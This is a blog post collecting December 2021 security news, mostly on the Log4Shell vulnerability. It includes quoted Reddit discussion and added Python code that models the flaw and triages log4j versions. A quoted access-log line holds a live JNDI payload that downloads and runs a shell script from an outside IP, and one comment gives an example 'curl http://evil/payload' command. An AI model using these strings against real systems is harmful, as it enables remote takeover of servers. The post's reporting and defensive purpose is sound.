This posting is here to collect cyber security news in December 2021.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
435 Comments
Tomi Engdahl says:
Oh, Microsoft…
“The bug was spotted on devices where a user installed Microsoft Teams but hadn’t logged in with an account. An “unintended interaction” between the app and Android prevented emergency calls from being placed properly.”
Microsoft Teams is the reason some Android users can’t dial 911
https://www.androidpolice.com/google-finally-knows-which-app-to-blame-for-androids-mysterious-cant-call-911-bug/
Tomi Engdahl says:
Google and Microsoft, working together, have identified a dangerous bug in Microsoft Teams. If you have Teams installed on an Android phone with Android version 10 or higher, don’t have Teams currently logged in, and try to call 911 (the US emergency services number), the phone will lock up without completing the call. A fix is in development, but the suggested work-around in the meanwhile is to leave Teams logged in at all times. If you do log out of Teams, you should immediately uninstall and reinstall Teams.
The article does not state whether Teams blocks emergency calls to other countries’ emergency numbers, such as 999 in Britain.
https://www.androidpolice.com/google-finally-knows-which-app-to-blame-for-androids-mysterious-cant-call-911-bug/
Tomi Engdahl says:
SonicWall Urges Customers to Immediately Patch Critical SMA 100 Flaws https://thehackernews.com/2021/12/sonicwall-urges-customers-to.html
Network security vendor SonicWall is urging customers to update their SMA 100 series appliances to the latest version following the discovery of multiple security vulnerabilities that could be abused by a remote attacker to take complete control of an affected system. The flaws impact SMA 200, 210, 400, 410, and 500v products running versions 9.0.0.11-31sv and earlier, 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier. The San Jose-based company credited security researchers Jake Baines (Rapid7) and Richard Warren (NCC Group) for discovering and reporting the shortcomings. Read more:
https://www.zdnet.com/article/get-patching-sonicwall-warns-of-vulnerabilties-in-sma-100-series-remote-access-devices/
Tomi Engdahl says:
Over 300,000 MikroTik Devices Found Vulnerable to Remote Hacking Bugs https://thehackernews.com/2021/12/over-300000-mikrotik-devices-found.html
At least 300,000 IP addresses associated with MikroTik devices have been found vulnerable to multiple remotely exploitable security vulnerabilities that have since been patched by the popular supplier of routers and wireless ISP devices. The most affected devices are located in China, Brazil, Russia, Italy, Indonesia, with the U.S. coming in at number eight, cybersecurity firm Eclypsium said in a report shared with The Hacker News. Read more:
https://www.bleepingcomputer.com/news/security/hundreds-of-thousands-of-mikrotik-devices-still-vulnerable-to-botnets/
Tomi Engdahl says:
ALPHV (BlackCat) is the first professional ransomware gang to use Rust https://therecord.media/alphv-blackcat-is-the-first-professional-ransomware-gang-to-use-rust/
Discovered by security researchers from Recorded Future and MalwareHunterTeam, the ransomware is named ALPHV (or BlackCat). The ransomware is technically the third ransomware strain written in Rust after a proof-of-concept strain was released on GitHub in 2020 and an experimental and now-defunct strain named BadBeeTeam was also seen later in the same year. But while they were first, ALPHV (BlackCat) is the first one to be created and deployed in the wild by what looks to be a professional cybercrime cartel.
Tomi Engdahl says:
Malicious npm packages caught stealing Discord tokens, environment variables https://therecord.media/malicious-npm-packages-caught-stealing-discord-tokens-environment-variables/
The Node Package Manager (npm) security team has removed 17 JavaScript libraries this week that contained malicious code to collect and steal Discord access tokens and environment variables from users’ computers.
Four of the npm JavaScript libraries contained functions to collect Discord access tokens, which effectively act as authentication cookies and can allow attackers to hijack an infected developer’s Discord account. A fifth npm package contained a copy of PirateStealer, a piece of malware that could also extract other data from Discord apps and accounts, such as payment card details, login credentials, and personal information. Another set of eleven libraries included functions that collected environment variables, which are details from a developer’s local programming environment. These variables normally store user and OS information, but in some cases, they can also contain API keys and login credentials, something that an attacker would definitely be interested in collecting.
Tomi Engdahl says:
Has your WordPress site been backdoored by a skimmer?
https://blog.malwarebytes.com/web-threats/2021/12/has-your-wordpress-site-been-backdoored-by-a-skimmer/
Skimmers and other threat actors are backdooring websites, and WordPress instances in particular, according to a recently released report. Researchers at Sucuri say attackers have developed methods to make sure that their grip on the infected site is not easily removed by applying the next update. They create a backdoor for themselves so they can easily take back control and insert their own code.
Tomi Engdahl says:
Beware of a new COVID pass scam: hang up the call immediately
https://www.iltalehti.fi/tietoturva/a/563c229f-2b9a-422c-b97f-af5d3e9052d9
A new scam-call campaign is circulating in which fraudsters ask for online banking credentials under the pretext of applying for a COVID certificate. If you receive a call asking for your bank credentials with reference to the COVID pass, you can end the call right away. Under no circumstances should you hand over your online banking credentials, as doing so can lead to financial losses.
Scam websites impersonating Omakanta have also circulated earlier, phishing for the same information. Kanta Services has compiled instructions for safe use of Omakanta on its website.
Tomi Engdahl says:
TP-Link routers under attack from Dark.IoT botnet https://therecord.media/tp-link-routers-under-attack-from-dark-iot-botnet/
The operators of a botnet known as Manga, Dark Mirai, and Dark.IoT are currently abusing a recently disclosed vulnerability to hijack TP-Link routers and add them to their network of hacked devices. The attacks, which began around two weeks ago, are abusing a vulnerability tracked as CVE-2021-41653, disclosed by Hungarian security researcher Matek Kamilló at the start of November. According to security firm Fortinet, Dark.IoT operators are most likely using default passwords to access devices and use Kamilló’s bug to gain full control over unpatched TP-Link TL-WR840N routers. While there are several DDoS botnets targeting routers that are currently active today, Fortinet said it’s been tracking this particular threat because its operator is one of the most active botnet developers today. Read more:
https://www.bleepingcomputer.com/news/security/dark-mirai-botnet-targeting-rce-on-popular-tp-link-router/
Tomi Engdahl says:
Mozilla Patches High-Severity Vulnerabilities in Firefox, Thunderbird
https://www.securityweek.com/mozilla-patches-high-severity-vulnerabilities-firefox-thunderbird
Mozilla this week released security updates for the Firefox browser and Thunderbird mail client to address multiple vulnerabilities, including several bugs rated high severity.
Firefox 95 started rolling out to users earlier this week with the new RLBox isolation technology inside, meant to improve protections from web attacks by sandboxing potentially problematic subcomponents.
The browser refresh also includes patches for 13 vulnerabilities, including six that have a severity rating of high. Some of these patches were also included in Firefox ESR 91.4 and Thunderbird 91.4.0.
The first of these high-severity vulnerabilities could result in the target URL being exposed during navigation when asynchronous functions are executed (CVE-2021-43536). Another one is a heap buffer overflow caused by the “incorrect type conversion of sizes from 64bit to 32bit integers” (CVE-2021-43537).
Looking to raise awareness of these vulnerabilities, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday issued an advisory to encourage organizations to apply the available patches as soon as possible.
https://www.cisa.gov/uscert/ncas/current-activity/2021/12/08/mozilla-releases-security-updates-firefox-firefox-esr-and
Tomi Engdahl says:
SonicWall Customers Warned of High-Risk Flaws in Remote Access Appliances
https://www.securityweek.com/sonicwall-customers-warned-high-risk-flaws-remote-access-appliances
Tomi Engdahl says:
Australian Electricity Provider ‘CS Energy’ Hit by Ransomware
https://www.securityweek.com/australian-electricity-provider-cs-energy-hit-ransomware
Australian electricity provider CS Energy has been hit by a ransomware attack, but the company says electricity generation has not been affected and it has denied claims that the attack was conducted by a state-sponsored threat group.
The attack was discovered on November 27 and the company informed the public about the incident a few days later.
Queensland-based CS Energy, which is owned by the local government, provides electricity to millions of homes, as well as to large commercial and industrial customers in Queensland.
CS Energy said the ransomware compromised devices on its corporate network, which was quickly isolated from other internal networks to prevent the malware from spreading. Safety and operations at its Kogan Creek and Callide power stations were not impacted, nor was power generation and delivery.
Tomi Engdahl says:
‘Moobot’ Botnet Targets Hikvision Devices via Recent Vulnerability
https://www.securityweek.com/moobot-botnet-targets-hikvision-devices-recent-vulnerability
A Mirai-based botnet dubbed ‘Moobot’ is attempting to exploit a recently addressed vulnerability that affects many Hikvision products, according to Fortinet’s FortiGuard Labs.
Tracked as CVE-2021-36260 and affecting over 70 cameras and NVRs from Hikvision, the critical-severity bug can be exploited to gain root access and completely take over vulnerable devices, without any form of user interaction.
Tomi Engdahl says:
Ransomware Operators Leak Data Stolen From Wind Turbine Giant Vestas
https://www.securityweek.com/ransomware-operators-leak-data-stolen-wind-turbine-giant-vestas
Cybercriminals have made public the data stolen recently from Danish wind turbine giant Vestas Wind Systems, and the company confirmed the leak on Wednesday.
Vestas became aware of the breach on November 19 and it immediately started shutting down IT systems. The company confirmed in late November that it had been hit by ransomware and that the breach resulted in internal files getting compromised.
The firm said the incident did not impact wind turbine operations and nearly all systems had been restored by late November.
In an update shared on Wednesday, the company informed employees and business partners that the attackers obtained personal information and that some of the compromised information has been leaked and possibly offered to third parties.
Tomi Engdahl says:
Emotet's return is worrying
https://etn.fi/index.php/13-news/12934-emotetin-paluu-huolestuttaa
Security company Check Point Software has published its malware review for November. The researchers report that the modular botnet and banking trojan Trickbot is the world's most common malware; it is present in five percent of corporate networks worldwide. Emotet, which was taken down in January, has returned to the list of the world's most common malware, ranking seventh in November.
Tomi Engdahl says:
There is a nasty nasty new Java exploit out there which can affect everyone from company servers to home computers (do you run Minecraft? Then you probably have Java).
If you haven’t already, I highly recommend you disable Java on your computer now. Like, now.
New zero-day exploit for Log4j Java library is an enterprise nightmare
https://www.bleepingcomputer.com/news/security/new-zero-day-exploit-for-log4j-java-library-is-an-enterprise-nightmare/
Proof-of-concept exploits for a critical zero-day vulnerability in the ubiquitous Apache Log4j Java-based logging library are currently being shared online, exposing home users and enterprises alike to ongoing remote code execution attacks.
Log4j is developed by the Apache Foundation and is widely used by both enterprise apps and cloud services.
Thus, while home users might have moved away from Java (although popular games like Minecraft still use it), anything from enterprise software to web apps and products from Apple, Amazon, Cloudflare, Twitter, and Steam is likely vulnerable to RCE exploits targeting this vulnerability.
Tomi Engdahl says:
Log4shell may well turn out to be the worst security hole of the year
The cloud services security team of the Chinese company Alibaba discovered an extremely serious vulnerability in the widely used Apache Java logging library Log4j. An attacker only needs to craft a suitable short text string and send it to the potential victim, for example via an instant messenger or a discussion forum. The attacker does not need to know the victim's password. In the worst case the attacker can run Java code of their choosing on the server, steal the account, and so on.
Millions of servers are now vulnerable, and there is little an ordinary user can do to protect themselves.
"The internet is on fire": Microsoft, Apple, Steam, Minecraft and millions of others are victims of the new vulnerability, perhaps the most serious ever found
Security experts are not mincing their words when describing the new log4shell vulnerability, which may be the worst ever discovered.
https://www.iltalehti.fi/digiuutiset/a/cee47cc3-4c0e-4f31-b4fe-4ae3bd97252c
One small snippet of text, copy and paste it into the right place, and done. The newly published zero-day vulnerability log4shell is like a master key to the internet. It affects millions of companies and exploiting it is so easy that even a grandmother from Pihtipudas could use it to break into a server remotely without logging into the system.
The problem was found in an open-source logging tool, i.e. a program of a kind that is in use on nearly every website. All the attacker has to do is get the application's log to record a particular snippet of text. Since the component in question is the very widely used Apache Java logging library Log4j, the impact is globally massive.
"The internet is on fire right now," Adam Meyers, head of the threat intelligence unit at security company Crowdstrike, said according to the AP news agency.
Amit Yoran, CEO of security company Tenable, in turn called log4shell "the single biggest, most critical vulnerability of the last decade" and perhaps of the entire history of modern computing.
The vulnerability in the Log4j component is under active exploitation: update immediately!
https://www.kyberturvallisuuskeskus.fi/fi/varoitus_5/2021
Security researchers found the Log4shell zero-day vulnerability (CVE-2021-44228) in the Apache Java logging library Log4j. The vulnerability allows an attacker to execute commands remotely on the server.
According to our information, attempts are being made to actively exploit the vulnerability against Finnish organisations as well.
It is strongly recommended to update Apache Log4j as soon as possible to version log4j-2.15.0-rc2. An ordinary user cannot take any action to fix the vulnerability; that is expected of administrators.
The critical vulnerability in Apache's Log4j component is being actively exploited. Apache released an update for the vulnerability on 9 December 2021 with version number log4j-2.15.0-rc2. Administrators should install the update without delay.
Tomi Engdahl says:
“All an attacker has to do to exploit the flaw is strategically send a malicious code string that eventually gets logged by Log4j version 2.0 or higher. The exploit lets an attacker load arbitrary Java code on a server, allowing them to take control.
“It’s a design failure of catastrophic proportions,” says Free Wortley, CEO of the open source data security platform LunaSec. Researchers at the company published a warning and initial assessment of the Log4j vulnerability on Thursday.
Minecraft screenshots circulating on forums appear to show players exploiting the vulnerability from the Minecraft chat function. On Friday, some Twitter users began changing their display names to code strings that could trigger the exploit. Another user changed his iPhone name to do the same and submitted the finding to Apple. Researchers told WIRED that the approach could also potentially work using email.
The United States Cybersecurity and Infrastructure Security Agency issued an alert about the vulnerability on Friday, as did Australia’s CERT. New Zealand’s government cybersecurity organization alert noted that the vulnerability is reportedly being actively exploited.
“It’s pretty dang bad,” says Wortley. “So many people are vulnerable, and this is so easy to exploit. There are some mitigating factors, but this being the real world there will be many companies that are not on current releases that are scrambling to fix this.”
Apache rates the vulnerability at “critical” severity and published patches and mitigations on Friday. The organization says that Chen Zhaojun of Alibaba Cloud Security Team first disclosed the vulnerability.
The situation underscores the challenges of managing risk within interdependent enterprise software. As Minecraft did, many organizations will need to develop their own patches or will be unable to patch immediately because they are running legacy software, like older versions of Java. Additionally, Log4j is not a casual thing to patch in live services because if something goes wrong an organization could compromise their logging capabilities at the moment when they need them most to watch for attempted exploitation.
There’s not much that average users can do, other than install updates for various online services whenever they’re available; most of the work to be done will be on the enterprise side, as companies and organizations scramble to implement fixes.
“Security-mature organizations will start trying to assess their exposure within hours of an exploit like this, but some organizations will take a few weeks, and some will never look at it,” a security engineer from a major software company told WIRED. The person asked not to be named because they are working closely with critical infrastructure response teams to address the vulnerability. “The internet is on fire, this shit is everywhere. And I do mean everywhere.”
While incidents like the SolarWinds hack and its fallout showed how wrong things can go when attackers infiltrate commonly used software, the Log4j meltdown speaks more to how widely the effects of a single flaw can be felt if it sits in a foundational piece of code that is incorporated into a lot of software.
“Library issues like this one pose a particularly bad supply chain scenario for fixing,” says Katie Moussouris, founder of Luta Security and a longtime vulnerability researcher. “Everything that uses that library must be tested with the fixed version in place. Having coordinated library vulnerabilities in the past, my sympathy is with those scrambling right now.”
For now, the priority is figuring out how widespread the problem truly is. Unfortunately, security teams and hackers alike are working overtime to find the answer.
https://www.wired.com/story/log4j-flaw-hacking-internet/
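The WIRED excerpt above compresses the mechanism into one sentence: a string that merely gets logged is interpreted. The following Python toy is added here as an illustration and is not code from log4j or from any of the quoted sources. It models the lookup substitution to show where the trust boundary broke: the vulnerable formatter expands ${prefix:key} lookups over the whole rendered line, user-supplied message included, while the hardened formatter expands them only in the operator-controlled pattern (the effect of -Dlog4j2.formatMsgNoLookups=true, and of the 2.15.0 default). The FakeJndi class only records the URL that would have been contacted; the hostname, the IP and the pattern are made up.

```python
import re
from typing import Callable, Dict, List, Tuple

# Toy model of log4j2-style "${prefix:key}" lookups. Illustration only, not log4j code.
_LOOKUP = re.compile(r"\$\{([a-z]+):([^}]*)\}", re.I)


class FakeJndi:
    """Stands in for the JNDI resolver. Instead of contacting the LDAP/RMI server
    and loading whatever class it hands back (the step that gives RCE in the real
    library), it just records the URL that would have been contacted."""

    def __init__(self) -> None:
        self.outbound: List[str] = []

    def __call__(self, target: str) -> str:
        self.outbound.append(target)
        return f"<object fetched from {target}>"


def make_resolvers(jndi: FakeJndi, env: Dict[str, str]) -> Dict[str, Callable[[str], str]]:
    # Two lookup prefixes are enough for the demo: a harmless one and the dangerous one.
    return {"env": lambda key: env.get(key, ""), "jndi": jndi}


def expand(text: str, resolvers: Dict[str, Callable[[str], str]]) -> str:
    """Replace every ${prefix:key} with the resolver's answer; unknown prefixes stay literal."""
    def repl(m: "re.Match[str]") -> str:
        fn = resolvers.get(m.group(1).lower())
        return fn(m.group(2)) if fn else m.group(0)
    return _LOOKUP.sub(repl, text)


def vulnerable_format(pattern: str, msg: str, resolvers) -> str:
    # Pre-2.15 behaviour: the untrusted message is spliced into the pattern first,
    # then lookups run over the WHOLE line, so attacker text gets interpreted.
    return expand(pattern.replace("%m", msg), resolvers)


def hardened_format(pattern: str, msg: str, resolvers) -> str:
    # Lookups run over the operator-controlled pattern only; the message is
    # inserted verbatim afterwards and is never interpreted.
    return expand(pattern, resolvers).replace("%m", msg)


def demo() -> Tuple[str, int, str, int]:
    """Log the same attacker-controlled header both ways and count outbound JNDI fetches."""
    jndi = FakeJndi()
    resolvers = make_resolvers(jndi, {"HOSTNAME": "web-01"})  # constructed environment
    pattern = "[${env:HOSTNAME}] %m"
    # Constructed attacker input as it would arrive in a User-Agent header (documentation IP).
    user_agent = "${jndi:ldap://198.51.100.7:1389/a}"
    vuln_line = vulnerable_format(pattern, f"User-Agent: {user_agent}", resolvers)
    fetches_vuln = len(jndi.outbound)
    safe_line = hardened_format(pattern, f"User-Agent: {user_agent}", resolvers)
    fetches_safe = len(jndi.outbound) - fetches_vuln
    return vuln_line, fetches_vuln, safe_line, fetches_safe


if __name__ == "__main__":
    v, nv, s, ns = demo()
    print("vulnerable:", v, "| outbound fetches:", nv)
    print("hardened:  ", s, "| outbound fetches:", ns)
```

The point the demo makes is that the fix is not input validation at the application layer (the string is perfectly valid log text) but removing interpretation from the data path: only the pattern, which the operator writes, may contain lookups.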
Tomi Engdahl says:
The Log4j vulnerability is bad. Here’s the good news
https://venturebeat.com/2021/12/10/the-log4j-vulnerability-is-bad-heres-the-good-news/
A critical vulnerability discovered in Log4j, a widely deployed open source Apache logging library, is almost certain to be exploited by hackers — probably very soon. Security teams are working full-throttle to patch their systems, trying to prevent a calamity. (The massive 2017 privacy records breach of Equifax involved a similar vulnerability.) It’s a very bad day, and it could get much worse soon.
But in some regards at least, businesses are in a better position to avoid a catastrophe now than in the past. This being 2021, there are some advantages now when it comes to responding to a zero-day bug of this severity, security executives and researchers told VentureBeat.
First and foremost, “the world is primed for responding to these disclosures, with companies moving to mitigate issues within hours,”
“This particular issue is potentially more dangerous because Log4j is widely adopted. [But] the Apache Log4j team pushed out a fix with urgency. How quickly they moved greatly reduced the chance of severely negative, long-term impacts.”
“In the past, you literally had zero days that were two years long,” Klein told VentureBeat. “Today, it really has changed. What we’re seeing is a better situation where the world is finding bug bounties useful, finding vulnerabilities, doing proof of concepts … I’d argue that this is a great example of [security in] 2021.”
Crucially, the Apache Log4j team “worked overnight in a nearly unprecedented way to understand and turn around a fix on this quickly,” Fox said. “Oftentimes, zero day reports can take months to come to fruition from report to release. This one appears to have happened within days.”
“For me, cybersecurity is finally at a point where the boardroom gets it. And even if they don’t understand it completely, they’re reaching out to someone in technical leadership and saying, ‘I need to understand this better,’” he said. “What’s really happening is, the world’s waking up.”
“For a long time, the only thing we used was Log4j. It’s not even the default library in some major frameworks anymore.”
Regardless, “we’ll be seeing this vulnerability for the rest of our careers in all the nooks and crannies of our IT footprint,” Dabirsiaghi said. “But five years ago, it would have been a lot worse.”
The threat posed by the remote code execution (RCE) vulnerability in Log4j is to potentially enable an attacker to remotely access and control devices.
“Since this vulnerability is a component of dozens if not hundreds of software packages, it could be hiding anywhere in an organization’s network, especially enterprises with massive environments and systems,”
“The fact that this occurred during December just means a lot of holiday time is going to be missed for security teams that have to respond to threats trying to take advantage of this mass vulnerability,” Sigler said. “This vulnerability is going to have a really long tail, and will likely ruin weekends and vacations for many IT and information security professionals across the globe.”
Given the scale of affected devices and exploitability of the bug, “it is highly likely to attract considerable attention from both cybercriminals and nation-state-associated actors,”
Security firms say the vulnerability has impacted version 2.0 through version 2.14.1 of Apache Log4j. Organizations are “advised to update to version 2.15.0 and place additional vigilance on logs associated with susceptible applications,” Morgan said.
One silver lining is that the configuration mitigations for the vulnerability are “straightforward” and can be easily implemented
Services including Apple iCloud and Steam, and apps including Minecraft, have been found to have vulnerabilities to the RCE vulnerability, according to LunaSec.
Ultimately, according to Amit Yoran, CEO of Tenable, “the good news is that we know about it.”
Log4Shell: RCE 0-day exploit found in log4j2, a popular Java logging package
https://www.lunasec.io/docs/blog/log4j-zero-day/
A few hours ago, a 0-day exploit in the popular Java logging library log4j2 was discovered that results in Remote Code Execution (RCE) by logging a certain string.
Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe. We’re calling it “Log4Shell” for short.
The 0-day was tweeted along with a POC posted on GitHub.
CVE-2021-44228(Apache Log4j Remote Code Execution)
Affected versions < 2.15.0
https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
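The version boundaries quoted above (2.0 through 2.14.1 affected, 2.15.0-rc2 named as the fix by the NCSC-FI advisory) and the note further down the page that the formatMsgNoLookups switch only exists from 2.10 translate into a simple triage rule. The Python script below is an added example, not a tool from any of the cited sources; it applies the rule to log4j jar file names found on a host. The sample paths are constructed. AFFECTED_FROM is set to 2.0-beta9, the first affected build in Apache's own advisory, which is slightly wider than the "2.0" the articles quote; FIXED_FROM is deliberately a parameter because Apache revised its recommended version after these articles were written, so confirm it against the current advisory before trusting a "fixed" verdict.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Boundaries as quoted on this page; re-check against Apache's current advisory.
AFFECTED_FROM = "2.0-beta9"   # first affected build per Apache (page quotes "2.0")
FIXED_FROM = "2.15.0-rc2"     # build named in the NCSC-FI advisory quoted above
NOLOOKUPS_FROM = "2.10.0"     # log4j2.formatMsgNoLookups first appears in 2.10

_VER = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:[-.]?(alpha|beta|rc)(\d+)?)?$", re.I)
_JAR = re.compile(r"log4j(?:-core)?-([0-9][0-9A-Za-z.\-]*?)\.jar$")
_RANK = {"alpha": 0, "beta": 1, "rc": 2, None: 3}  # a final release sorts after its pre-releases


def version_key(v: str) -> Tuple[int, int, int, int, int]:
    """Sortable key for log4j version strings such as 2.14.1, 2.0-beta9 or 2.15.0-rc2."""
    m = _VER.match(v.strip())
    if not m:
        raise ValueError(f"unrecognised log4j version: {v!r}")
    major, minor, patch, tag, num = m.groups()
    return (int(major), int(minor), int(patch or 0), _RANK[tag.lower() if tag else None], int(num or 0))


@dataclass
class Verdict:
    path: str
    version: str
    status: str        # vulnerable | fixed | not-affected | unknown
    flag_usable: bool  # is -Dlog4j2.formatMsgNoLookups=true honoured at all?
    action: str


def classify(version: str) -> Tuple[str, bool, str]:
    """Map one version string to (status, flag_usable, recommended action)."""
    try:
        key = version_key(version)
    except ValueError:
        return "unknown", False, "could not parse version; read the jar manifest by hand"
    if key < version_key(AFFECTED_FROM):
        return "not-affected", False, "outside the 2.x range named for CVE-2021-44228; confirm separately"
    if key >= version_key(FIXED_FROM):
        return "fixed", True, "no action for this CVE"
    if key >= version_key(NOLOOKUPS_FROM):
        return "vulnerable", True, "upgrade; until then start the JVM with -Dlog4j2.formatMsgNoLookups=true"
    return "vulnerable", False, "upgrade immediately; this version has no formatMsgNoLookups switch"


def triage(jar_paths: List[str]) -> List[Verdict]:
    """Classify every log4j jar in an inventory; log4j-api-*.jar is skipped (the lookup code lives in core)."""
    verdicts: List[Verdict] = []
    for path in jar_paths:
        m = _JAR.search(path)
        if not m:
            continue
        version = m.group(1)
        status, flag, action = classify(version)
        verdicts.append(Verdict(path, version, status, flag, action))
    return verdicts


# Constructed inventory, e.g. what `find / -name 'log4j*.jar'` might return.
SAMPLE_JARS = [
    "/opt/app/lib/log4j-core-2.14.1.jar",
    "/opt/app/lib/log4j-api-2.14.1.jar",
    "/opt/legacy/WEB-INF/lib/log4j-core-2.8.2.jar",
    "/opt/app2/lib/log4j-core-2.15.0.jar",
    "/opt/old/lib/log4j-1.2.17.jar",
    "/opt/build/lib/log4j-core-2.x-SNAPSHOT.jar",
    "/opt/app/lib/commons-logging-1.2.jar",
]

if __name__ == "__main__":
    for v in triage(SAMPLE_JARS):
        print(f"{v.status:13} {v.version:14} {v.path}  -> {v.action}")
```

A file-name scan like this is only a first pass: shaded or repackaged jars carry log4j classes under other names, so a thorough inventory also looks for JndiLookup.class inside every archive on the host.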
Tomi Engdahl says:
Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit
The vulnerability allows remote code execution on servers including those operated by Apple, Cloudflare, Twitter, Valve, Tencent, and other major service providers.
https://uk.pcmag.com/security/137617/countless-serves-are-vulnerable-to-apache-log4j-zero-day-exploit
Tomi Engdahl says:
Alert: Active scanning for Apache Log4j 2 vulnerability (CVE-2021-44228)
The NCSC is advising organisations to take steps to mitigate the Apache Log4j 2 vulnerability.
https://www.ncsc.gov.uk/news/apache-log4j-vulnerability
Tomi Engdahl says:
https://www.itpro.co.uk/security/cyber-attacks/361800/hackers-publish-vestas-data
Tomi Engdahl says:
Nine WiFi Routers Used by Millions Were Vulnerable to 226 Flaws
https://m.slashdot.org/story/393499
from the hole-truth dept.
“Security researchers analyzed nine popular WiFi routers and found a total of 226 potential vulnerabilities in them,” reports Bleeping Computer, “even when running the latest firmware.” Slashdot reader joshuark shared their report:
https://www.iot-inspector.com/blog/router-security-check-2021/
Tomi Engdahl says:
https://appleinsider.com/articles/21/12/10/severe-flaw-in-java-library-impacts-icloud-amazon-steam-and-more?utm_source=sendible&utm_medium=social&utm_campaign=RSS
Tomi Engdahl says:
https://old.reddit.com/r/programming/comments/rcxehp/rce_0day_exploit_found_in_log4j_a_popular_java/
Tomi Engdahl says:
just add the jvm argument -Dlog4j2.formatMsgNoLookups=true to disable this absolutely ludicrous default “feature”
[–]vlakreeh 111 points 2 days ago
From what I’ve heard that jvm argument was added in 2.9.0 or so, so if you are using a version older than that you’ll still need to update.
[–]revnhoj 66 points 2 days ago
yep, looks like this first appeared in 2.10 per this
https://logging.apache.org/log4j/log4j-2.14.1/log4j-core/xref/org/apache/logging/log4j/core/util/Constants.html
so this workaround won’t work for all.
Yeah, specifically I’m seeing access logs with User-Agents with ${jndi:}. Most of the cases appear to be pointing to an LDAP server.
I’m not even using Java and I’m seeing logs like this:
xxx.xxx.xxx.xxx - - [10/Dec/2021:13:46:56 +0000] "GET / HTTP/1.1" 200 5633 "-" "${jndi:ldap://xxx.xxx.xxx.xxx:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81MS4yMjIuMjA2LjE2OjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC81MS4yMjIuMjA2LjE2OjQ0Myl8YmFzaA==}"
Most modern projects I’ve seen use SLF4J + Logback, rather than Log4j. But yes, this is a big fucking deal.
In a nutshell, most java applications are legacy because of log4j.
Let’s say we have a system that uses 10 libraries. 7 of them use a specific version of log4j. If we try to update one of those libraries, then it could require a different version of log4j that could be incompatible with the rest of them. Conclusion: everything will fall apart.
log4j was the main culprit of the dependency hell and it is the reason why so many systems still use java 6 even when it was discontinued a decade ago. And some companies still use java 5.
Logging actually is pretty complex, at least if you’re running anything remotely complicated.
The issue here is that someone implemented a feature that’s stupid.
The log4j repo contains about 297,000 lines of code. Even excluding tests, it’s 190,000 lines.
For comparison, Nginx is 204,000 lines. Git is 306,000 lines. BtrFS is 146,000.
Should logging be slightly less complex than a full featured web server (that also handles logging), or more complex than the whole file system you’re logging to?
log4j is massively, idiotically, superlatively overcomplicated, with now-obvious and self-evident costs. It is definitely the case that writing a logging framework that meets the needs of a sizeable application is non-trivial, though. If all you want is configurable levels, you can probably write a wrapper around stderr in a few dozen lines; but to be a serious contender, you need hierarchical configuration of individual loggers, including level filters, destination (stderr, files—and if you’re logging to a file, you need to think about log rotation—probably multiple network logging protocols), format, etc.; and it needs to be fast as hell even when a whole pile of threads are trying to log huge volumes to the same output and need to be synchronized.
Concurrency can be a bitch when logging.. I wrote a lib for it a while back and the concurrency in the handler for threaded classes was annoying to make.
Distributed systems are pretty messy too.
This might be the worst exploit ever.
The amount of damage that can be done is insane.
And unlike exploits that were specific to a single entity, log4j and java are ubiquitous in many industries, including banking and financial.
Imagine being able to generate all the banking transactions you want and do this for multiple banks. Tens if not hundreds.
I would be more worried if it wasn’t.
I think that is the normal reaction.
Shit has to happen ASAP. Code needs to be audited. Other measures need to be put in place before the code gets to be fixed and deployed.
JVM generally isn’t going to let you execute random bytes from memory, so the Java program has to be tricked to load new code via a legitimate API. Log4j can be persuaded to load a class definition (which contains executable code) from an attacker-controlled location over the network.
Loading class definitions from the network? Yeah, that’s definitely a feature a logging library should have… /s
Java RCE usually happens because some dork thinks deserializing an arbitrary Java object and popping it into the JVM is a good idea. Depending on the type of class, deserializing it may immediately execute Java bytecode defined inside the class, which can include all sorts of fun stuff like calls to Runtime.getRuntime().exec(“oh shit”);, NukeManager.launchTheNukes();, or anything else that happens to be on your classpath. And as the attacker, you get to choose the type of class to be deserialized – it can be an instance of any class the target has on its classpath – and there are dozens of vulnerable objects across many popular Java libraries.
Here’s a toy example of how this works..
This has been known for like a zillion years and has caused a zillion CVEs, so at this point there are off-the-shelf tools like ysoserial that take your payload and wrap it into an object that kabooms when deserialized, with like 20 different choices of methods depending on what dangerous classes are available on the target’s classpath for deserialization.
It’s a similar reason to why you shouldn’t depickle random people’s objects in Python, although the Java exploit is a little harder to explain lol.
In this case there’s a combination of two goddammits: The logger connecting to a web server in the first place, and the web server providing a Java object which the logger happily attempts to deserialize in order to toString() and log it.
Java RCE usually happens because some dork thinks deserializing an arbitrary Java object and popping it into the JVM is a good idea.
True words. It’s as bad as “security” based on ‘private’ methods/fields. There was even a combination of the two problems a few years ago, where the “security manager” or whatever that class was called inside the applet/webstart stuff, could be replaced by a serialized security manager, through a “private” method though. I.e. you had to use reflection to make that method “public” before adding a broken security manager, which again allowed anything to be executed.
This specific RCE works via having a class be deserialized by the JVM and getting loaded. You can have static initialization code in a class (in Java), so an attacker can put the code they want to execute in that static initialization block.
You can do rop (return oriented programming). There you don’t inject actual code with your payload, but just a manipulated stack with lots of weird return addresses. As it turns out even the C standard lib is big enough to have every instruction you would want to have immediately before a return somewhere. So you just craft a stack that has a sequence of all those addresses as return addresses. Then you still can execute whatever you want. I mean, put some string like “curl http://evil/payload > evil.sh; sh evil.sh” in the stack and put the start of system() as the return address and you’re done. (If you can predict memory addresses.)
I was writing SELinux policies for a java application once. As far as I remember I had to enable stuff like executable stack, because “Java handles that in a secure way”.
But basically, because Java is a JIT-compiled language you have to allow write and execute permissions to the same memory block. And if you abstract class loading enough it becomes easy to download a class from somewhere and then load it like you would a local file.
Same as in scripting languages where you just have an “eval” function
Source:
https://old.reddit.com/r/programming/comments/rcxehp/rce_0day_exploit_found_in_log4j_a_popular_java/
Tomi Engdahl says:
[logback-dev] Remote code execution vulnerability in log4j 2.x
http://mailman.qos.ch/pipermail/logback-dev/2021-December/012649.html
Hello all,
